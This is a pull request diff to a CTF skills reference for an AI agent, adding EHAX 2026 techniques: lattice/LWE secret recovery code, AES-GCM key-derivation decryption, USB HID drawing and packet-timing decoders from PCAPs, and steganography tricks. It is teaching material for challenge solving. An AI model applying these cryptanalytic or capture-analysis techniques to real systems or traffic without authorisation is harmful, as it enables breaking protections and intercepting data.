### PR TITLE
Add techniques from EHAX CTF 2026 writeup

### DIFF
--- a/README.md
+++ b/README.md
@@ -12,14 +12,14 @@ npx skills add ljagiello/ctf-skills
 
 | Skill | Files | Description |
 |-------|-------|-------------|
-| **ctf-web** | 6 | SQLi, XSS, SSTI, SSRF, JWT, prototype pollution, file upload RCE, Node.js VM escape, XXE, JSFuck, Web3/Solidity, CVEs |
-| **ctf-pwn** | 5 | Buffer overflow, ROP chains, format string, heap exploitation, seccomp bypass, sandbox escape, custom VMs, kernel pwn |
-| **ctf-crypto** | 8 | RSA, AES, ECC, PRNG, ZKP, classic/modern ciphers, S-box collision, Manger's oracle, GF(2) CRT, historical ciphers |
-| **ctf-reverse** | 3 | Binary analysis, custom VMs, WASM, Rust serde, Python bytecode, OPAL, UEFI, game clients, anti-debug, .NET/Android RE |
-| **ctf-forensics** | 7 | Disk/memory forensics, Windows/Linux forensics, steganography, network captures, 3D printing, blockchain, signals/hardware (VGA, HDMI, DisplayPort) |
-| **ctf-osint** | 3 | Social media, geolocation, username enumeration, DNS recon, archive research, Google dorking, Telegram bots, FEC filings |
+| **ctf-web** | 6 | SQLi, XSS, SSTI, SSRF, JWT, prototype pollution, file upload RCE, Node.js VM escape, XXE, JSFuck, Web3/Solidity, delegatecall abuse, HAProxy bypass, polyglot XSS, CVEs |
+| **ctf-pwn** | 6 | Buffer overflow, ROP chains, format string, heap exploitation, FSOP, seccomp bypass, sandbox escape, custom VMs, VM UAF slab reuse, kernel pwn |
+| **ctf-crypto** | 8 | RSA, AES, ECC, PRNG, ZKP, LWE/CVP lattice attacks, AES-GCM, classic/modern ciphers, S-box collision, Manger's oracle, GF(2) CRT, historical ciphers |
+| **ctf-reverse** | 3 | Binary analysis, custom VMs, WASM, RISC-V, Rust serde, Python bytecode, OPAL, UEFI, game clients, anti-debug, convergence bitmap, .NET/Android RE |
+| **ctf-forensics** | 7 | Disk/memory forensics, Windows/Linux forensics, steganography, network captures, USB HID drawing, UART decode, side-channel power analysis, packet timing, 3D printing, signals/hardware (VGA, HDMI, DisplayPort) |
+| **ctf-osint** | 3 | Social media, geolocation, Street View panorama matching, username enumeration, DNS recon, archive research, Google dorking, Telegram bots, FEC filings |
 | **ctf-malware** | 3 | Obfuscated scripts, C2 traffic, custom crypto protocols, .NET malware, PyInstaller unpacking, PE analysis, sandbox evasion |
-| **ctf-misc** | 6 | Pyjails, bash jails, encodings, RF/SDR, DNS exploitation, Unicode stego, floating-point tricks, WASM, K8s |
+| **ctf-misc** | 6 | Pyjails, bash jails, encodings, RF/SDR, DNS exploitation, Unicode stego, floating-point tricks, game theory, commitment schemes, WASM, K8s, custom assembly sandbox escape |
 | **solve-challenge** | 0 | Orchestrator skill — analyzes challenge and delegates to category skills |
 
 ## Usage

--- a/ctf-crypto/SKILL.md
+++ b/ctf-crypto/SKILL.md
@@ -21,7 +21,7 @@ Quick reference for crypto CTF challenges. Each technique has a one-liner here; 
 - [zkp-and-advanced.md](zkp-and-advanced.md) - ZKP/graph 3-coloring, Z3 solver guide, garbled circuits, Shamir SSS, bigram constraint solving, race conditions
 - [prng.md](prng.md) - PRNG attacks (MT19937, LCG, GF(2) matrix PRNG, middle-square, deterministic RNG hill climbing, random-mode oracle, time-based seeds, password cracking)
 - [historical.md](historical.md) - Historical ciphers (Lorenz SZ40/42, book cipher implementation)
-- [advanced-math.md](advanced-math.md) - Advanced mathematical attacks (isogenies, Pohlig-Hellman, LLL, Coppersmith, quaternion RSA, monotone inversion, GF(2)[x] CRT, S-box collision code)
+- [advanced-math.md](advanced-math.md) - Advanced mathematical attacks (isogenies, Pohlig-Hellman, LLL, Coppersmith, quaternion RSA, monotone inversion, GF(2)[x] CRT, S-box collision code, LWE lattice CVP attack)
 
 ---
 
@@ -80,6 +80,14 @@ See [rsa-attacks.md](rsa-attacks.md) and [advanced-math.md](advanced-math.md) fo
 - **Isogenies:** Graph traversal via modular polynomials; pathfinding via LCA
 
 See [ecc-attacks.md](ecc-attacks.md) and [advanced-math.md](advanced-math.md) for full code examples.
+
+## Lattice / LWE Attacks
+
+- **LWE via CVP (Babai):** Construct lattice from `[q*I | 0; A^T | I]`, use fpylll CVP.babai to find closest vector, project to ternary {-1,0,1}. Watch for endianness mismatches between server description and actual encoding.
+- **LLL for approximate GCD:** Short vector in lattice reveals hidden factors
+- **Multi-layer challenges:** Geometry → subspace recovery → LWE → AES-GCM decryption chain
+
+See [advanced-math.md](advanced-math.md) for full LWE solving code and multi-layer patterns.
 
 ## ZKP & Constraint Solving
 

--- a/ctf-crypto/SKILL.md
+++ b/ctf-crypto/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: ctf-crypto
-description: Cryptography attack techniques for CTF challenges. Use when attacking encryption, hashing, signatures, ZKP, PRNG, or mathematical crypto problems involving RSA, AES, ECC, lattices, number theory, Coppersmith, Pollard, Wiener, padding oracle, or stream/block cipher weaknesses.
+description: Cryptography attack techniques for CTF challenges. Use when attacking encryption, hashing, signatures, ZKP, PRNG, or mathematical crypto problems involving RSA, AES, ECC, lattices, LWE, CVP, number theory, Coppersmith, Pollard, Wiener, padding oracle, GCM, key derivation, or stream/block cipher weaknesses.
 license: MIT
 compatibility: Requires filesystem-based agent (Claude Code or similar) with bash, Python 3, and internet access for tool installation.
 allowed-tools: Bash Read Write Edit Glob Grep Task WebFetch WebSearch

--- a/ctf-crypto/advanced-math.md
+++ b/ctf-crypto/advanced-math.md
@@ -14,6 +14,7 @@
 - [Non-Permutation S-box Collision Attack (Nullcon 2026)](#non-permutation-s-box-collision-attack-nullcon-2026)
 - [Polynomial CRT in GF(2)[x] (Nullcon 2026)](#polynomial-crt-in-gf2x-nullcon-2026)
 - [Manger's RSA Padding Oracle Attack (Nullcon 2026)](#mangers-rsa-padding-oracle-attack-nullcon-2026)
+- [LWE Lattice Attack via CVP (EHAX 2026)](#lwe-lattice-attack-via-cvp-ehax-2026)
 - [Affine Cipher over Non-Prime Modulus (Nullcon 2026)](#affine-cipher-over-non-prime-modulus-nullcon-2026)
 
 ---
@@ -500,6 +501,105 @@ key = lo  # ~64 queries for 64-bit key
 ```
 
 **Total queries:** ~128 (64 for phase 1 + 64 for phase 2).
+
+---
+
+## LWE Lattice Attack via CVP (EHAX 2026)
+
+**Pattern (Dream Labyrinth):** Multi-layer challenge ending with Learning With Errors (LWE) recovery. Secret vector `s` in {-1, 0, 1}^n, public matrix A, ciphertext `b = A*s + e (mod q)`.
+
+**LWE solving with fpylll (CVP/Babai):**
+```python
+from fpylll import IntegerMatrix, LLL, CVP
+import numpy as np
+
+q = 3329  # Common LWE modulus (Kyber uses this)
+n = 256   # Secret dimension
+m = 512   # Number of samples
+
+# A is m×n matrix, b is m-vector, all mod q
+# Construct lattice basis for CVP approach
+# Lattice: rows of [q*I_m | 0] on top, [A^T | I_n] below
+# Target: b
+
+def solve_lwe_cvp(A, b, q, n, m):
+    # Build lattice basis (m+n) × (m+n)
+    dim = m + n
+    B = IntegerMatrix(dim, dim)
+
+    # Top m rows: q*I_m (ensures solutions mod q)
+    for i in range(m):
+        B[i, i] = q
+
+    # Bottom n rows: A columns + identity
+    for j in range(n):
+        for i in range(m):
+            B[m + j, i] = int(A[i][j])
+        B[m + j, m + j] = 1
+
+    # LLL reduce the basis
+    LLL.reduction(B)
+
+    # Target vector: (b | 0...0)
+    target = [int(b[i]) for i in range(m)] + [0] * n
+
+    # CVP via Babai's nearest plane
+    closest = CVP.babai(B, target)
+
+    # Extract secret from last n components
+    s_candidate = [closest[m + j] for j in range(n)]
+
+    # Project to ternary {-1, 0, 1}
+    s = []
+    for val in s_candidate:
+        val_mod = val % q
+        if val_mod == 0:
+            s.append(0)
+        elif val_mod == 1:
+            s.append(1)
+        elif val_mod == q - 1:
+            s.append(-1)
+        else:
+            # Try closest ternary value
+            s.append(min([-1, 0, 1], key=lambda t: abs((val_mod - t) % q)))
+    return s
+
+s = solve_lwe_cvp(A, b, q, n, m)
+```
+
+**CRITICAL: Endianness gotcha.** Server may describe data as "big-endian" but actually use little-endian (or vice versa). If CVP produces garbage, try swapping byte order of the secret interpretation:
+```python
+# If server says big-endian but actually uses little-endian:
+s_bytes_le = bytes([(v % 256) for v in s])  # little-endian
+s_bytes_be = s_bytes_le[::-1]               # big-endian
+# Try both interpretations for key derivation
+```
+
+**Key derivation after LWE recovery (common pattern):**
+```python
+import hashlib
+from Cryptodome.Cipher import AES
+
+s_bytes = bytes([(v % 256) for v in s])
+
+# Recover session nonce: XOR wrapped_nonce with hash of secret
+session_nonce = bytes(a ^ b for a, b in
+    zip(wrapped_nonce, hashlib.sha256(s_bytes).digest()[:16]))
+
+# Derive AES key from secret + nonce
+aes_key = hashlib.sha256(s_bytes + session_nonce).digest()
+
+# Decrypt AES-GCM
+cipher = AES.new(aes_key, AES.MODE_GCM, nonce=aes_nonce)
+plaintext = cipher.decrypt_and_verify(ciphertext, tag)
+```
+
+**Layer patterns in multi-stage crypto challenges:**
+- **Layer 1 (Geometry):** Reconstruct point positions from noisy distance measurements. Use least-squares or trilateration with multiple models. Compute convex hull of recovered points.
+- **Layer 2 (Subspace):** Find hidden low-dimensional subspace in high-dimensional data. Self-dot products of candidate vectors identify correct answers (smallest self-dot products = closest to subspace).
+- **Layer 3 (LWE):** Recover secret vector from lattice problem. Use CVP with fpylll, project result to expected domain (ternary, binary, etc.).
+
+**References:** EHAX CTF 2026 "Dream Labyrinth". Related: Kyber/CRYSTALS lattice cryptography.
 
 ---
 

--- a/ctf-crypto/modern-ciphers.md
+++ b/ctf-crypto/modern-ciphers.md
@@ -130,6 +130,32 @@ Affine encryption `c = A*x + b (mod M)` with composite M: split into prime facto
 
 ---
 
+## AES-GCM with Derived Keys (EHAX 2026)
+
+**Pattern:** Final decryption step after recovering a secret (e.g., from LWE, key exchange). Session nonce and AES key derived via SHA-256 hashing of the recovered secret.
+
+```python
+import hashlib
+from Cryptodome.Cipher import AES
+
+# Common key derivation chain:
+# 1. Recover secret bytes (s_bytes) from crypto challenge
+# 2. Unwrap session nonce: nonce = wrapped_nonce XOR SHA256(s_bytes)[:nonce_len]
+# 3. Derive AES key: key = SHA256(s_bytes + session_nonce)
+# 4. Decrypt AES-GCM
+
+def decrypt_with_derived_key(s_bytes, wrapped_nonce, ciphertext, aes_nonce, tag, nonce_len=16):
+    secret_hash = hashlib.sha256(s_bytes).digest()
+    session_nonce = bytes(a ^ b for a, b in zip(wrapped_nonce, secret_hash[:nonce_len]))
+    aes_key = hashlib.sha256(s_bytes + session_nonce).digest()
+    cipher = AES.new(aes_key, AES.MODE_GCM, nonce=aes_nonce)
+    return cipher.decrypt_and_verify(ciphertext, tag)
+```
+
+**Key insight:** When AES-GCM authentication fails (`ValueError: MAC check failed`), the derived key is wrong — usually means the upstream secret recovery was incorrect or endianness is swapped.
+
+---
+
 ## Custom Linear MAC Forgery (Nullcon 2026)
 
 **Pattern (Pasty):** Server signs paste IDs with a custom SHA-256-based construction. The signature is linear in three 8-byte secret blocks derived from the key.

--- a/ctf-forensics/SKILL.md
+++ b/ctf-forensics/SKILL.md
@@ -18,7 +18,7 @@ Quick reference for forensics CTF challenges. Each technique has a one-liner her
 - [windows.md](windows.md) - Windows forensics (registry, SAM, event logs, recycle bin, USN journal, PowerShell history, Defender MPLog, WMI persistence, Amcache)
 - [network.md](network.md) - Network forensics (PCAP, SMB3, WordPress, credentials, NTLMv2 cracking, USB HID steno, USB HID mouse/pen drawing recovery, BCD encoding, HTTP file upload exfiltration, packet interval timing encoding)
 - [disk-and-memory.md](disk-and-memory.md) - Disk/memory forensics (Volatility, disk mounting/carving, VM/OVA/VMDK, coredumps, deleted partitions, ZFS, VMware snapshots, ransomware analysis, GPT GUID encoding, VMDK sparse parsing)
-- [steganography.md](steganography.md) - Steganography (binary border stego, PDF multi-layer stego, FFT frequency domain, DTMF audio, SSTV+LSB, SVG keyframes, PNG reorder, file overlays, JPEG unused DQT table LSB, custom frequency dual-tone keypad)
+- [steganography.md](steganography.md) - Steganography (binary border stego, PDF multi-layer stego, FFT frequency domain, DTMF audio, SSTV+LSB, SVG keyframes, PNG reorder, file overlays, JPEG unused DQT table LSB, custom frequency dual-tone keypad, multi-track audio differential subtraction)
 - [linux-forensics.md](linux-forensics.md) - Linux/app forensics (log analysis, Docker image forensics, attack chains, browser credentials, Firefox history, TFTP, TLS weak RSA, USB audio, Git directory recovery)
 - [signals-and-hardware.md](signals-and-hardware.md) - Hardware signal decoding with decode code (VGA frame parsing, HDMI TMDS symbol decode, DisplayPort 8b/10b + LFSR descrambler), Voyager Golden Record audio, Saleae Logic 2 UART decode, Flipper Zero .sub files, side-channel power analysis (DPA)
 
@@ -110,6 +110,7 @@ stegsolve                    # Visual analysis
 
 - **Custom freq DTMF:** Non-standard dual-tone frequencies; generate spectrogram first (`ffmpeg -i audio -lavfi showspectrumpic`), map custom grid to keypad digits, decode variable-length ASCII
 - **JPEG DQT LSB:** Unused quantization tables (ID 2, 3) carry LSB-encoded data; access via `Image.open().quantization` and extract bit 0 from each of 64 values
+- **Multi-track audio subtraction:** Two nearly-identical audio tracks in MKV/video; `sox -m a0.wav "|sox a1.wav -p vol -1" diff.wav` cancels shared content, flag appears in spectrogram of difference signal (5-12 kHz band)
 - **Packet interval timing:** Identical packets with two distinct interval values (e.g., 10ms/100ms) encode binary; filter by interface, compute inter-packet deltas, threshold to bits
 
 See [steganography.md](steganography.md) for full code examples and decoding workflows.

--- a/ctf-forensics/SKILL.md
+++ b/ctf-forensics/SKILL.md
@@ -16,11 +16,11 @@ Quick reference for forensics CTF challenges. Each technique has a one-liner her
 
 - [3d-printing.md](3d-printing.md) - 3D printing forensics (PrusaSlicer binary G-code, QOIF, heatshrink)
 - [windows.md](windows.md) - Windows forensics (registry, SAM, event logs, recycle bin, USN journal, PowerShell history, Defender MPLog, WMI persistence, Amcache)
-- [network.md](network.md) - Network forensics (PCAP, SMB3, WordPress, credentials, NTLMv2 cracking, USB HID steno, BCD encoding, HTTP file upload exfiltration)
+- [network.md](network.md) - Network forensics (PCAP, SMB3, WordPress, credentials, NTLMv2 cracking, USB HID steno, BCD encoding, HTTP file upload exfiltration, packet interval timing encoding)
 - [disk-and-memory.md](disk-and-memory.md) - Disk/memory forensics (Volatility, disk mounting/carving, VM/OVA/VMDK, coredumps, deleted partitions, ZFS, VMware snapshots, ransomware analysis, GPT GUID encoding, VMDK sparse parsing)
-- [steganography.md](steganography.md) - Steganography (binary border stego, PDF multi-layer stego, FFT frequency domain, DTMF audio, SSTV+LSB, SVG keyframes, PNG reorder, file overlays)
+- [steganography.md](steganography.md) - Steganography (binary border stego, PDF multi-layer stego, FFT frequency domain, DTMF audio, SSTV+LSB, SVG keyframes, PNG reorder, file overlays, JPEG unused DQT table LSB, custom frequency dual-tone keypad)
 - [linux-forensics.md](linux-forensics.md) - Linux/app forensics (log analysis, Docker image forensics, attack chains, browser credentials, Firefox history, TFTP, TLS weak RSA, USB audio, Git directory recovery)
-- [signals-and-hardware.md](signals-and-hardware.md) - Hardware signal decoding with decode code (VGA frame parsing, HDMI TMDS symbol decode, DisplayPort 8b/10b + LFSR descrambler), Voyager Golden Record audio, Flipper Zero .sub files
+- [signals-and-hardware.md](signals-and-hardware.md) - Hardware signal decoding with decode code (VGA frame parsing, HDMI TMDS symbol decode, DisplayPort 8b/10b + LFSR descrambler), Voyager Golden Record audio, Flipper Zero .sub files, side-channel power analysis (DPA)
 
 ---
 
@@ -107,6 +107,10 @@ stegsolve                    # Visual analysis
 - **SVG keyframes:** Animation `keyTimes`/`values` attributes encode binary/Morse via fill color alternation
 - **PNG chunk reorder:** Fix chunk order: IHDR → ancillary → IDAT (in order) → IEND
 - **File overlays:** Check after IEND for appended archives with overwritten magic bytes
+
+- **Custom freq DTMF:** Non-standard dual-tone frequencies; generate spectrogram first (`ffmpeg -i audio -lavfi showspectrumpic`), map custom grid to keypad digits, decode variable-length ASCII
+- **JPEG DQT LSB:** Unused quantization tables (ID 2, 3) carry LSB-encoded data; access via `Image.open().quantization` and extract bit 0 from each of 64 values
+- **Packet interval timing:** Identical packets with two distinct interval values (e.g., 10ms/100ms) encode binary; filter by interface, compute inter-packet deltas, threshold to bits
 
 See [steganography.md](steganography.md) for full code examples and decoding workflows.
 
@@ -221,6 +225,8 @@ See [linux-forensics.md](linux-forensics.md) for full browser credential decrypt
 - **Deleted partitions:** `testdisk` or `kpartx -av`. See [disk-and-memory.md](disk-and-memory.md).
 - **ZFS forensics:** Reconstruct labels, Fletcher4 checksums, PBKDF2 cracking. See [disk-and-memory.md](disk-and-memory.md).
 - **Hardware signals:** VGA/HDMI TMDS/DisplayPort, Voyager audio, Flipper Zero. See [signals-and-hardware.md](signals-and-hardware.md).
+- **Side-channel power analysis:** Multi-dimensional power traces (positions × guesses × traces × samples). Average across traces, find sample with max variance, select guess with max power at leak point. See [signals-and-hardware.md](signals-and-hardware.md).
+- **Packet interval timing:** Binary data encoded as inter-packet delays in PCAP. Two interval values = two bit values. See [network.md](network.md).
 - **G-code visualization:** Side projections (XZ/YZ) reveal text. See [3d-printing.md](3d-printing.md).
 - **Git directory recovery:** `gitdumper.sh` for exposed `.git` dirs. See [linux-forensics.md](linux-forensics.md).
 

--- a/ctf-forensics/SKILL.md
+++ b/ctf-forensics/SKILL.md
@@ -16,11 +16,11 @@ Quick reference for forensics CTF challenges. Each technique has a one-liner her
 
 - [3d-printing.md](3d-printing.md) - 3D printing forensics (PrusaSlicer binary G-code, QOIF, heatshrink)
 - [windows.md](windows.md) - Windows forensics (registry, SAM, event logs, recycle bin, USN journal, PowerShell history, Defender MPLog, WMI persistence, Amcache)
-- [network.md](network.md) - Network forensics (PCAP, SMB3, WordPress, credentials, NTLMv2 cracking, USB HID steno, BCD encoding, HTTP file upload exfiltration, packet interval timing encoding)
+- [network.md](network.md) - Network forensics (PCAP, SMB3, WordPress, credentials, NTLMv2 cracking, USB HID steno, USB HID mouse/pen drawing recovery, BCD encoding, HTTP file upload exfiltration, packet interval timing encoding)
 - [disk-and-memory.md](disk-and-memory.md) - Disk/memory forensics (Volatility, disk mounting/carving, VM/OVA/VMDK, coredumps, deleted partitions, ZFS, VMware snapshots, ransomware analysis, GPT GUID encoding, VMDK sparse parsing)
 - [steganography.md](steganography.md) - Steganography (binary border stego, PDF multi-layer stego, FFT frequency domain, DTMF audio, SSTV+LSB, SVG keyframes, PNG reorder, file overlays, JPEG unused DQT table LSB, custom frequency dual-tone keypad)
 - [linux-forensics.md](linux-forensics.md) - Linux/app forensics (log analysis, Docker image forensics, attack chains, browser credentials, Firefox history, TFTP, TLS weak RSA, USB audio, Git directory recovery)
-- [signals-and-hardware.md](signals-and-hardware.md) - Hardware signal decoding with decode code (VGA frame parsing, HDMI TMDS symbol decode, DisplayPort 8b/10b + LFSR descrambler), Voyager Golden Record audio, Flipper Zero .sub files, side-channel power analysis (DPA)
+- [signals-and-hardware.md](signals-and-hardware.md) - Hardware signal decoding with decode code (VGA frame parsing, HDMI TMDS symbol decode, DisplayPort 8b/10b + LFSR descrambler), Voyager Golden Record audio, Saleae Logic 2 UART decode, Flipper Zero .sub files, side-channel power analysis (DPA)
 
 ---
 
@@ -224,7 +224,8 @@ See [linux-forensics.md](linux-forensics.md) for full browser credential decrypt
 - **Linux ransomware + memory dump:** If Volatility is unreliable, recover AES key via raw-memory candidate scanning and magic-byte validation; re-extract zip cleanly to avoid missing files/false negatives. See [disk-and-memory.md](disk-and-memory.md).
 - **Deleted partitions:** `testdisk` or `kpartx -av`. See [disk-and-memory.md](disk-and-memory.md).
 - **ZFS forensics:** Reconstruct labels, Fletcher4 checksums, PBKDF2 cracking. See [disk-and-memory.md](disk-and-memory.md).
-- **Hardware signals:** VGA/HDMI TMDS/DisplayPort, Voyager audio, Flipper Zero. See [signals-and-hardware.md](signals-and-hardware.md).
+- **Hardware signals:** VGA/HDMI TMDS/DisplayPort, Voyager audio, Saleae UART decode, Flipper Zero. See [signals-and-hardware.md](signals-and-hardware.md).
+- **USB HID mouse drawing:** Render relative HID movements per draw mode as bitmap; separate modes, skip pen lifts, scale 5-8x. See [network.md](network.md).
 - **Side-channel power analysis:** Multi-dimensional power traces (positions × guesses × traces × samples). Average across traces, find sample with max variance, select guess with max power at leak point. See [signals-and-hardware.md](signals-and-hardware.md).
 - **Packet interval timing:** Binary data encoded as inter-packet delays in PCAP. Two interval values = two bit values. See [network.md](network.md).
 - **G-code visualization:** Side projections (XZ/YZ) reveal text. See [3d-printing.md](3d-printing.md).

--- a/ctf-forensics/SKILL.md
+++ b/ctf-forensics/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: ctf-forensics
-description: Digital forensics and blockchain analysis for CTF challenges. Use when analyzing disk images, memory dumps, event logs, network captures, cryptocurrency transactions, steganography, PDF analysis, Windows registry, Volatility, PCAP, Docker images, coredumps, or recovering deleted files and credentials.
+description: Digital forensics and signal analysis for CTF challenges. Use when analyzing disk images, memory dumps, event logs, network captures, cryptocurrency transactions, steganography, PDF analysis, Windows registry, Volatility, PCAP, Docker images, coredumps, side-channel power traces, DTMF audio spectrograms, packet timing analysis, or recovering deleted files and credentials.
 license: MIT
 compatibility: Requires filesystem-based agent (Claude Code or similar) with bash, Python 3, and internet access for tool installation.
 allowed-tools: Bash Read Write Edit Glob Grep Task WebFetch WebSearch

--- a/ctf-forensics/network.md
+++ b/ctf-forensics/network.md
@@ -401,6 +401,24 @@ for mode in [1, 2]:
 - **Time gradient:** Color points by temporal order (rainbow gradient) to trace stroke direction
 - **Character segmentation:** Group consecutive same-mode points by large X gaps to isolate characters
 
+**Alternative: AWK extraction + SVG rendering (faster pipeline):**
+```bash
+# Extract capdata and convert to signed deltas in one pass
+tshark -r pref.pcap -Y "usb.transfer_type==0x01 && usb.endpoint_address==0x81 && usb.capdata" \
+  -T fields -e usb.capdata > capdata.txt
+
+awk '
+function hexval(c){ return index("0123456789abcdef",tolower(c))-1 }
+function hex2dec(h, n,i){ n=0; for(i=1;i<=length(h);i++) n=n*16+hexval(substr(h,i,1)); return n }
+function s16(u){ return (u>=32768)?u-65536:u }
+{ d=$1; if(length(d)!=14) next
+  btn=hex2dec(substr(d,3,2))
+  x=s16(hex2dec(substr(d,7,2) substr(d,5,2)))
+  y=s16(hex2dec(substr(d,11,2) substr(d,9,2)))
+  print btn, x, y }' capdata.txt > deltas.txt
+```
+Then render with SVG (Python) — filter on pen-down state (button=2), accumulate deltas, flip Y axis, draw strokes between consecutive pen-down points.
+
 **Difference from keyboard HID:** Mouse HID uses relative movements (accumulated), keyboard uses keycodes (direct). Mouse drawing requires rendering; keyboard requires keymap lookup.
 
 ---

--- a/ctf-forensics/network.md
+++ b/ctf-forensics/network.md
@@ -14,6 +14,7 @@
 - [BCD Encoding in UDP (VuwCTF 2025)](#bcd-encoding-in-udp-vuwctf-2025)
 - [HTTP File Upload Exfiltration in PCAP (MetaCTF 2026)](#http-file-upload-exfiltration-in-pcap-metactf-2026)
 - [Packet Interval Timing-Based Encoding (EHAX 2026)](#packet-interval-timing-based-encoding-ehax-2026)
+- [USB HID Mouse/Pen Drawing Recovery (EHAX 2026)](#usb-hid-mousepen-drawing-recovery-ehax-2026)
 - [NTLMv2 Hash Cracking from PCAP (Pragyan 2026)](#ntlmv2-hash-cracking-from-pcap-pragyan-2026)
 
 ---
@@ -326,6 +327,81 @@ print(data.decode(errors='replace'))
 **Key insight:** When identical packets appear on a single interface with only two practical interval values, it's almost certainly binary encoding via timing. The content is noise — the signal is in the gaps. Filter by interface and count unique intervals first.
 
 **Scale tip:** Large PCAPs (millions of packets) often have the signal in a tiny subset. Triage with `tshark -q -z io,phs` to find which interface has the fewest packets — that's likely the data carrier.
+---
+
+## USB HID Mouse/Pen Drawing Recovery (EHAX 2026)
+
+**Pattern (Painter):** PCAP contains USB HID interrupt transfers from a mouse/pen device. Drawing data encoded as relative movements with multiple draw modes.
+
+**Packet format (7-byte HID reports):**
+| Byte | Field | Notes |
+|------|-------|-------|
+| 0 | Button state | 0x01 = pressed (may be constant) |
+| 1 | Mode/pad | 0=hover, 1=draw mode 1, 2=draw mode 2 |
+| 2-3 | dx (int16 LE) | Relative X movement |
+| 4-5 | dy (int16 LE) | Relative Y movement |
+| 6 | Wheel | Usually 0 |
+
+**Extraction and rendering:**
+```python
+import struct
+from PIL import Image, ImageDraw
+
+# Extract HID data
+# tshark -r capture.pcap -Y "usb.transfer_type==1" -T fields -e usb.capdata
+
+packets = []
+with open('hid_data.txt') as f:
+    for line in f:
+        raw = bytes.fromhex(line.strip().replace(':', ''))
+        if len(raw) >= 7:
+            btn = raw[0]
+            mode = raw[1]
+            dx = struct.unpack('<h', raw[2:4])[0]
+            dy = struct.unpack('<h', raw[4:6])[0]
+            packets.append((btn, mode, dx, dy))
+
+# Accumulate positions per mode
+SCALE = 5
+positions = {0: [], 1: [], 2: []}
+x, y = 0, 0
+for btn, mode, dx, dy in packets:
+    x += dx
+    y += dy
+    positions[mode].append((x, y))
+
+# Render each mode separately (different colors = different text layers)
+for mode in [1, 2]:
+    pts = positions[mode]
+    if not pts:
+        continue
+    min_x = min(p[0] for p in pts) - 100
+    min_y = min(p[1] for p in pts) - 100
+    max_x = max(p[0] for p in pts) + 100
+    max_y = max(p[1] for p in pts) + 100
+    w = (max_x - min_x) * SCALE
+    h = (max_y - min_y) * SCALE
+    img = Image.new('RGB', (w, h), 'white')
+    draw = ImageDraw.Draw(img)
+    for i in range(1, len(pts)):
+        x0 = (pts[i-1][0] - min_x) * SCALE
+        y0 = (pts[i-1][1] - min_y) * SCALE
+        x1 = (pts[i][0] - min_x) * SCALE
+        y1 = (pts[i][1] - min_y) * SCALE
+        # Skip long jumps (pen lifts)
+        if abs(pts[i][0]-pts[i-1][0]) < 50 and abs(pts[i][1]-pts[i-1][1]) < 50:
+            draw.line([(x0,y0),(x1,y1)], fill='black', width=3)
+    img.save(f'mode_{mode}.png')
+```
+
+**Key techniques:**
+- **Separate modes:** Different button/mode values draw different text layers — render each independently
+- **Skip pen lifts:** Large dx/dy jumps indicate pen was lifted, not drawn — filter by distance threshold
+- **High resolution:** Scale 5-8x with margins for readable handwriting
+- **Time gradient:** Color points by temporal order (rainbow gradient) to trace stroke direction
+- **Character segmentation:** Group consecutive same-mode points by large X gaps to isolate characters
+
+**Difference from keyboard HID:** Mouse HID uses relative movements (accumulated), keyboard uses keycodes (direct). Mouse drawing requires rendering; keyboard requires keymap lookup.
 
 ---
 

--- a/ctf-forensics/network.md
+++ b/ctf-forensics/network.md
@@ -13,6 +13,7 @@
 - [USB HID Stenography/Chord PCAP (UTCTF 2024)](#usb-hid-stenographychord-pcap-utctf-2024)
 - [BCD Encoding in UDP (VuwCTF 2025)](#bcd-encoding-in-udp-vuwctf-2025)
 - [HTTP File Upload Exfiltration in PCAP (MetaCTF 2026)](#http-file-upload-exfiltration-in-pcap-metactf-2026)
+- [Packet Interval Timing-Based Encoding (EHAX 2026)](#packet-interval-timing-based-encoding-ehax-2026)
 - [NTLMv2 Hash Cracking from PCAP (Pragyan 2026)](#ntlmv2-hash-cracking-from-pcap-pragyan-2026)
 
 ---
@@ -286,6 +287,45 @@ tshark -r capture.pcap -q -z "follow,tcp,ascii,1"
 - "Dead drop" pattern: attacker uploads file to web server for later retrieval
 
 **Lesson:** Always start with `--export-objects` to extract transferred files before deep packet analysis. The flag is often in the exfiltrated file itself.
+
+---
+
+## Packet Interval Timing-Based Encoding (EHAX 2026)
+
+**Pattern (Breathing Void):** Large PCAPNG with millions of packets, but only a few hundred on one interface carry data. The signal is in the **timing gaps** between identical packets, not their content.
+
+**Identification:** Challenge mentions "breathing", "void", "silence", or timing. PCAP has many interfaces but only one has interesting traffic. Packets are identical but spaced at two distinct intervals.
+
+**Decoding workflow:**
+```python
+from scapy.all import rdpcap
+
+packets = rdpcap('challenge.pcapng')
+
+# 1. Filter to the right interface (e.g., interface 2)
+# tshark: tshark -r challenge.pcapng -Y "frame.interface_id == 2" -T fields -e frame.time_epoch
+
+# 2. Compute inter-packet intervals
+times = [float(pkt.time) for pkt in packets if pkt.sniffed_on == 'interface_2']
+intervals = [times[i+1] - times[i] for i in range(len(times)-1)]
+
+# 3. Identify binary mapping (two distinct interval values)
+# E.g., 10ms → 0, 100ms → 1 (threshold at ~50ms)
+threshold = 0.05  # 50ms
+bits = [0 if dt < threshold else 1 for dt in intervals]
+
+# 4. May need to prepend a leading 0 bit (first interval has no predecessor)
+bits = [0] + bits
+
+# 5. Convert bits to bytes (MSB-first)
+data = bytes(int(''.join(str(b) for b in bits[i:i+8]), 2)
+             for i in range(0, len(bits) - 7, 8))
+print(data.decode(errors='replace'))
+```
+
+**Key insight:** When identical packets appear on a single interface with only two practical interval values, it's almost certainly binary encoding via timing. The content is noise — the signal is in the gaps. Filter by interface and count unique intervals first.
+
+**Scale tip:** Large PCAPs (millions of packets) often have the signal in a tiny subset. Triage with `tshark -q -z io,phs` to find which interface has the fewest packets — that's likely the data carrier.
 
 ---
 

--- a/ctf-forensics/signals-and-hardware.md
+++ b/ctf-forensics/signals-and-hardware.md
@@ -6,6 +6,7 @@
 - [DisplayPort 8b/10b + LFSR Decoding](#displayport-8b10b-lfsr-decoding)
 - [Voyager Golden Record Audio (0xFun 2026)](#voyager-golden-record-audio-0xfun-2026)
 - [Side-Channel Power Analysis (EHAX 2026)](#side-channel-power-analysis-ehax-2026)
+- [Saleae Logic 2 UART Decode (EHAX 2026)](#saleae-logic-2-uart-decode-ehax-2026)
 - [Flipper Zero .sub File (0xFun 2026)](#flipper-zero-sub-file-0xfun-2026)
 
 ---
@@ -185,6 +186,69 @@ flag = hashlib.sha256(key.encode()).hexdigest()
